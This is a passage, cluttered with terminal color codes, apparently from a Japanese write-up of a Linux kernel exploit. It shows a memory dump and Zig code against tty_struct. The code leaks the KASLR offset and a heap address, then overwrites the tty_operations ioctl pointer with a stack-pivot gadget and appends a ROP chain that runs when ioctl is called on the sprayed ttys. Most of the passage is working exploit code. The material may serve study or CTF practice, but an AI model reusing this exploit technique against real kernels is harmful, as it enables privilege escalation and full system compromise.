�[1m�[37m00007ffed91dc4a8�[0m�[1m�[37m �[0m�[1m�[36mB0�[0m�[1m�[37m �[0m�[1m�[36m58�[0m�[1m�[37m �[0m�[1m�[36m0D�[0m�[1m�[37m �[0m�[1m�[36m03�[0m�[1m�[37m �[0m�[1m�[36m80�[0m�[1m�[37m �[0m�[1m�[36m88�[0m�[1m�[37m �[0m�[1m�[36mFF�[0m�[1m�[37m �[0m�[1m�[36mFF�[0m�[1m�[37m �[0m�[1m�[36mB0�[0m�[1m�[37m �[0m�[1m�[36m58�[0m�[1m�[37m �[0m�[1m�[36m0D�[0m�[1m�[37m �[0m�[1m�[36m03�[0m�[1m�[37m �[0m�[1m�[36m80�[0m�[1m�[37m �[0m�[1m�[36m88�[0m�[1m�[37m �[0m�[1m�[36mFF�[0m�[1m�[37m �[0m�[1m�[36mFF�[0m�[1m�[37m �[0m�[33m.X␍......X␍.....�[0m�[1m�[37m�[0m
�[1m�[37m00007ffed91dc4b8�[0m�[1m�[37m �[0m�[1m�[36m00�[0m�[1m�[37m �[0m�[1m�[36m00�[0m�[1m�[37m �[0m�[1m�[36m00�[0m�[1m�[37m �[0m�[1m�[36m00�[0m�[1m�[37m �[0m�[1m�[36m00�[0m�[1m�[37m �[0m�[1m�[36m00�[0m�[1m�[37m �[0m�[1m�[36m00�[0m�[1m�[37m �[0m�[1m�[36m00�[0m�[1m�[37m �[0m�[1m�[36m00�[0m�[1m�[37m �[0m�[1m�[36m00�[0m�[1m�[37m �[0m�[1m�[36m00�[0m�[1m�[37m �[0m�[1m�[36m00�[0m�[1m�[37m �[0m�[1m�[36m00�[0m�[1m�[37m �[0m�[1m�[36m00�[0m�[1m�[37m �[0m�[1m�[36m00�[0m�[1m�[37m �[0m�[1m�[36m00�[0m�[1m�[37m �[0m�[33m................�[0m�[1m�[37m�[0m
�[1m�[37m00007ffed91dc4c8�[0m�[1m�[37m �[0m�[1m�[36m00�[0m�[1m�[37m �[0m�[1m�[36m00�[0m�[1m�[37m �[0m�[1m�[36m00�[0m�[1m�[37m �[0m�[1m�[36m00�[0m�[1m�[37m �[0m�[1m�[36m00�[0m�[1m�[37m �[0m�[1m�[36m00�[0m�[1m�[37m �[0m�[1m�[36m00�[0m�[1m�[37m �[0m�[1m�[36m00�[0m�[1m�[37m �[0m�[1m�[36mD8�[0m�[1m�[37m �[0m�[1m�[36m58�[0m�[1m�[37m �[0m�[1m�[36m0D�[0m�[1m�[37m �[0m�[1m�[36m03�[0m�[1m�[37m �[0m�[1m�[36m80�[0m�[1m�[37m �[0m�[1m�[36m88�[0m�[1m�[37m �[0m�[1m�[36mFF�[0m�[1m�[37m �[0m�[1m�[36mFF�[0m�[1m�[37m �[0m�[33m.........X␍.....�[0m�[1m�[37m�[0m
�[1m�[37m00007ffed91dc4d8�[0m�[1m�[37m �[0m�[1m�[36mD8�[0m�[1m�[37m �[0m�[1m�[36m58�[0m�[1m�[37m �[0m�[1m�[36m0D�[0m�[1m�[37m �[0m�[1m�[36m03�[0m�[1m�[37m �[0m�[1m�[36m80�[0m�[1m�[37m �[0m�[1m�[36m88�[0m�[1m�[37m �[0m�[1m�[36mFF�[0m�[1m�[37m �[0m�[1m�[36mFF�[0m�[1m�[37m �[0m�[1m�[36m00�[0m�[1m�[37m �[0m�[1m�[36m00�[0m�[1m�[37m �[0m�[1m�[36m00�[0m�[1m�[37m �[0m�[1m�[36m00�[0m�[1m�[37m �[0m�[1m�[36m00�[0m�[1m�[37m �[0m�[1m�[36m00�[0m�[1m�[37m �[0m�[1m�[36m00�[0m�[1m�[37m �[0m�[1m�[36m00�[0m�[1m�[37m �[0m�[33m.X␍.............�[0m�[1m�[37m�[0m
�[1m�[37m00007ffed91dc4e8�[0m�[1m�[37m �[0m�[1m�[36m00�[0m�[1m�[37m �[0m�[1m�[36m00�[0m�[1m�[37m �[0m�[1m�[36m00�[0m�[1m�[37m �[0m�[1m�[36m00�[0m�[1m�[37m �[0m�[1m�[36m00�[0m�[1m�[37m �[0m�[1m�[36m00�[0m�[1m�[37m �[0m�[1m�[36m00�[0m�[1m�[37m �[0m�[1m�[36m00�[0m�[1m�[37m �[0m�[1m�[36mF8�[0m�[1m�[37m �[0m�[1m�[36m58�[0m�[1m�[37m �[0m�[1m�[36m0D�[0m�[1m�[37m �[0m�[1m�[36m03�[0m�[1m�[37m �[0m�[1m�[36m80�[0m�[1m�[37m �[0m�[1m�[36m88�[0m�[1m�[37m �[0m�[1m�[36mFF�[0m�[1m�[37m �[0m�[1m�[36mFF�[0m�[1m�[37m �[0m�[33m.........X␍.....�[0m�[1m�[37m�[0m
なんと、�[40m�[35m`tty_struct`�[39m�[49mには両方のリクがある!
確かに便利ね。
通常の�[40m�[35m`tty_struct`�[39m�[49mなら�[40m�[35m`ops`�[39m�[49mの
値はptmx_fops [3]のアドレス(このvmlinuxでは�[40m`0xffffffff81c38880`�[49m)、そ
して�[40m�[35m`ldisc_sem.read_wait`�[39m�[49mの値は�[40m�[35m`tty_str
uct`�[39m�[49mのアドレス.
�[33m// as of 5.10.7�[0m
�[33mconst�[0m�[1m�[37m �[0m�[1m�[37mtty_struct�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[33mextern�[0m�[1m�[37m �[0m�[33mstruct�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mconst�[0m�[1m�[37m �[0m�[1m�[37mld_semaphore�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[33mextern�[0m�[1m�[37m �[0m�[33mstruct�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mconst�[0m�[1m�[37m �[0m�[1m�[37mlist_head�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[33mextern�[0m�[1m�[37m �[0m�[33mstruct�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mnext�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[36musize�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36m0xdeadbeefdeadbeef�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mprev�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[36musize�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36m0xcafebabecafebabe�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m};�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mcount�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[36mu64�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36m0�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mwait_lock�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[36mi32�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36m0�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mwait_readers�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[36mi32�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36m0�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mread_wait�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[37mlist_head�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37m.{},�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mwrite_wait�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[37mlist_head�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37m.{},�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m};�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mmagic�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[36mi32�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36m0x5401�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mkref�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[36mi32�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36m0�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mdev�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[36musize�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36m0�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mdriver�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[36musize�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[33m// must be a valid heap address�[0m
�[1m�[37m �[0m�[1m�[37mops�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[36musize�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mindex�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[36mi32�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36m0�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mldisc_sem�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[37mld_semaphore�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37m.{},�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33m// don't care about the rest�[0m
�[1m�[37m�[0m
�[1m�[37m �[0m�[33mpub�[0m�[1m�[37m �[0m�[33mfn�[0m�[1m�[37m �[0m�[37minit�[0m�[1m�[37m(�[0m�[1m�[37mops_table�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[36musize�[0m�[1m�[37m)�[0m�[1m�[37m �[0m�[1m�[37mtty_struct�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33m// ops_table must live on the heap�[0m
�[1m�[37m �[0m�[33mreturn�[0m�[1m�[37m �[0m�[1m�[37m.{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mdriver�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37mops_table�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mops�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37mops_table�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mldisc_sem�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37m.{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mread_wait�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37m.{�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mnext�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37mops_table�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mprev�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37mops_table�[0m�[1m�[37m �[0m�[1m�[37m},�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mwrite_wait�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37m.{�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mnext�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37mops_table�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mprev�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37mops_table�[0m�[1m�[37m �[0m�[1m�[37m},�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m},�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m};�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m}�[0m�[1m�[37m�[0m
�[1m�[37m};�[0m�[1m�[37m�[0m
�[33mconst�[0m�[1m�[37m �[0m�[1m�[37mtty_operations�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[33mextern�[0m�[1m�[37m �[0m�[33mstruct�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mlookup�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[36musize�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36m0�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37minstall�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[36musize�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36m0�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mremove�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[36musize�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36m0�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mopen�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[36musize�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36m0�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mclose�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[36musize�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36m0�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mshutdown�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[36musize�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36m0�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mcleanup�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[36musize�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36m0�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mwrite�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[36musize�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36m0�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mput_char�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[36musize�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36m0�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mflush_chars�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[36musize�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36m0�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mwrite_room�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[36musize�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36m0�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mchars_in_buffer�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[36musize�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36m0�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mioctl�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[36musize�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m};�[0m�[1m�[37m�[0m
�[33mfn�[0m�[1m�[37m �[0m�[37mleakKASLROffset�[0m�[1m�[37m(�[0m�[1m�[37mfd�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[37mposix�[0m�[1m�[37m.�[0m�[1m�[37mfd_t�[0m�[1m�[37m)�[0m�[1m�[37m �[0m�[1m�[36m!�[0m�[1m�[36mu64�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mconst�[0m�[1m�[37m �[0m�[1m�[37mptmx_fops_addr�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[36mu64�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36m0xffffffff81c38880�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m �[0m�[33mvar�[0m�[1m�[37m �[0m�[1m�[37mbuf�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[37m[�[0m�[1m�[36m0x400�[0m�[1m�[36m+�[0m�[37m@offsetOf�[0m�[1m�[37m(�[0m�[1m�[37mtty_struct�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[33m"ops"�[0m�[1m�[37m)�[0m�[1m�[36m+�[0m�[37m@sizeOf�[0m�[1m�[37m(�[0m�[37m@FieldType�[0m�[1m�[37m(�[0m�[1m�[37mtty_struct�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[33m"ops"�[0m�[1m�[37m))]�[0m�[1m�[36mu8�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36mundefined�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m_�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[33mtry�[0m�[1m�[37m �[0m�[1m�[37mposix�[0m�[1m�[37m.�[0m�[37mread�[0m�[1m�[37m(�[0m�[1m�[37mfd�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36m&�[0m�[1m�[37mbuf�[0m�[1m�[37m);�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mconst�[0m�[1m�[37m �[0m�[1m�[37mret�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37mstd�[0m�[1m�[37m.�[0m�[1m�[37mmem�[0m�[1m�[37m.�[0m�[37mbytesAsValue�[0m�[1m�[37m(�[0m�[1m�[36mu64�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37mbuf�[0m�[1m�[37m[�[0m�[1m�[37mbuf�[0m�[1m�[37m.�[0m�[1m�[37mlen�[0m�[1m�[36m-�[0m�[1m�[36m8�[0m�[1m�[37m..]).�[0m�[1m�[36m*�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mreturn�[0m�[1m�[37m �[0m�[1m�[37mret�[0m�[1m�[37m �[0m�[1m�[36m-�[0m�[1m�[37m �[0m�[1m�[37mptmx_fops_addr�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[1m�[37m}�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[33mfn�[0m�[1m�[37m �[0m�[37mleakGBuf�[0m�[1m�[37m(�[0m�[1m�[37mfd�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[37mposix�[0m�[1m�[37m.�[0m�[1m�[37mfd_t�[0m�[1m�[37m)�[0m�[1m�[37m �[0m�[1m�[36m!�[0m�[1m�[36mu64�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mconst�[0m�[1m�[37m �[0m�[1m�[37moffset�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[33mcomptime�[0m�[1m�[37m �[0m�[1m�[37mblk�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mconst�[0m�[1m�[37m �[0m�[1m�[37mld_semaphore�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[37m@FieldType�[0m�[1m�[37m(�[0m�[1m�[37mtty_struct�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[33m"ldisc_sem"�[0m�[1m�[37m);�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mbreak�[0m�[1m�[37m �[0m�[1m�[36m:�[0m�[1m�[37mblk�[0m�[1m�[37m �[0m�[37m@offsetOf�[0m�[1m�[37m(�[0m�[1m�[37mtty_struct�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[33m"ldisc_sem"�[0m�[1m�[37m)�[0m�[1m�[37m �[0m�[1m�[36m+�[0m�[1m�[37m �[0m�[37m@offsetOf�[0m�[1m�[37m(�[0m�[1m�[37mld_semaphore�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[33m"read_wait"�[0m�[1m�[37m)�[0m�[1m�[37m �[0m�[1m�[36m+�[0m�[1m�[37m �[0m�[37m@sizeOf�[0m�[1m�[37m(�[0m�[37m@typeInfo�[0m�[1m�[37m(�[0m�[37m@FieldType�[0m�[1m�[37m(�[0m�[1m�[37mld_semaphore�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[33m"read_wait"�[0m�[1m�[37m)).�[0m�[1m�[37m@�[0m�[33m"struct"�[0m�[1m�[37m.�[0m�[1m�[37mfields�[0m�[1m�[37m[�[0m�[1m�[36m0�[0m�[1m�[37m].�[0m�[1m�[36mtype�[0m�[1m�[37m);�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m};�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mvar�[0m�[1m�[37m �[0m�[1m�[37mbuf�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[37m[�[0m�[1m�[36m0x400�[0m�[1m�[36m+�[0m�[1m�[37moffset�[0m�[1m�[37m]�[0m�[1m�[36mu8�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36mundefined�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m_�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[33mtry�[0m�[1m�[37m �[0m�[1m�[37mposix�[0m�[1m�[37m.�[0m�[37mread�[0m�[1m�[37m(�[0m�[1m�[37mfd�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36m&�[0m�[1m�[37mbuf�[0m�[1m�[37m);�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mconst�[0m�[1m�[37m �[0m�[1m�[37mret�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37mstd�[0m�[1m�[37m.�[0m�[1m�[37mmem�[0m�[1m�[37m.�[0m�[37mbytesAsValue�[0m�[1m�[37m(�[0m�[1m�[36mu64�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37mbuf�[0m�[1m�[37m[�[0m�[1m�[37mbuf�[0m�[1m�[37m.�[0m�[1m�[37mlen�[0m�[1m�[36m-�[0m�[1m�[36m8�[0m�[1m�[37m..]).�[0m�[1m�[36m*�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mreturn�[0m�[1m�[37m �[0m�[1m�[37mret�[0m�[1m�[37m �[0m�[1m�[36m-�[0m�[1m�[37m �[0m�[1m�[37m(�[0m�[1m�[37mbuf�[0m�[1m�[37m.�[0m�[1m�[37mlen�[0m�[1m�[36m-�[0m�[1m�[36m8�[0m�[1m�[37m);�[0m�[1m�[37m�[0m
�[1m�[37m}�[0m�[1m�[37m�[0m
ROPしたいから、悪質の�[40m�[35m`tty_operations`�[39m�[49mの�[40m�[35m`ioct
l`�[39m�[49mの値はスタックピボットのアドレスに読み込んでる。
それと、�[40m�[35m`ioctl`�[39m�[49mを読んでる時に幾つかのレジースタは管理できるから、第二引数はROPc
hainのアドレスにする(こう:�[40m`for (ttys) |tty| _ = std.os.linux.ioctl(tty,
0xdeadbeef, ropchain_addr);`�[49m�[24m)。
�[33mfn�[0m�[1m�[37m �[0m�[37mposionTTYStruct�[0m�[1m�[37m(�[0m�[1m�[37mfd�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[37mposix�[0m�[1m�[37m.�[0m�[1m�[37mfd_t�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37mg_buf_addr�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[36mu64�[0m�[1m�[37m)�[0m�[1m�[37m �[0m�[1m�[36m!�[0m�[1m�[36mvoid�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mconst�[0m�[1m�[37m �[0m�[1m�[37mfile�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37m(�[0m�[1m�[37mstd�[0m�[1m�[37m.�[0m�[1m�[37mfs�[0m�[1m�[37m.�[0m�[1m�[37mFile�[0m�[1m�[37m{�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mhandle�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37mfd�[0m�[1m�[37m �[0m�[1m�[37m}).�[0m�[37mwriter�[0m�[1m�[37m();�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mvar�[0m�[1m�[37m �[0m�[1m�[37mbw�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37mstd�[0m�[1m�[37m.�[0m�[1m�[37mio�[0m�[1m�[37m.�[0m�[37mbufferedWriter�[0m�[1m�[37m(�[0m�[1m�[37mfile�[0m�[1m�[37m);�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mconst�[0m�[1m�[37m �[0m�[1m�[37mwriter�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37mbw�[0m�[1m�[37m.�[0m�[37mwriter�[0m�[1m�[37m();�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m �[0m�[33mconst�[0m�[1m�[37m �[0m�[1m�[37mfake_tty_ops�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37mtty_operations�[0m�[1m�[37m{�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mioctl�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37mPUSH_RDX_MOV_EBP_0x415bffd9_POP_RSP_POP_R13_POP_RBP�[0m�[1m�[37m �[0m�[1m�[37m};�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mtry�[0m�[1m�[37m �[0m�[1m�[37mwriter�[0m�[1m�[37m.�[0m�[37mwriteAll�[0m�[1m�[37m(�[0m�[1m�[37mstd�[0m�[1m�[37m.�[0m�[1m�[37mmem�[0m�[1m�[37m.�[0m�[37masBytes�[0m�[1m�[37m(�[0m�[1m�[36m&�[0m�[1m�[37mfake_tty_ops�[0m�[1m�[37m));�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mvar�[0m�[1m�[37m �[0m�[1m�[37mn_written�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[36musize�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[37m@sizeOf�[0m�[1m�[37m(�[0m�[37m@TypeOf�[0m�[1m�[37m(�[0m�[1m�[37mfake_tty_ops�[0m�[1m�[37m));�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mn_written�[0m�[1m�[37m �[0m�[1m�[36m+=�[0m�[1m�[37m �[0m�[33mtry�[0m�[1m�[37m �[0m�[37mropchain�[0m�[1m�[37m(�[0m�[1m�[37mwriter�[0m�[1m�[37m);�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m �[0m�[33mtry�[0m�[1m�[37m �[0m�[1m�[37mwriter�[0m�[1m�[37m.�[0m�[37mwriteByteNTimes�[0m�[1m�[37m(�[0m�[33m'A'�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36m0x400�[0m�[1m�[37m �[0m�[1m�[36m-�[0m�[1m�[37m �[0m�[1m�[37mn_written�[0m�[1m�[37m);�[0m�[1m�[37m�[0m
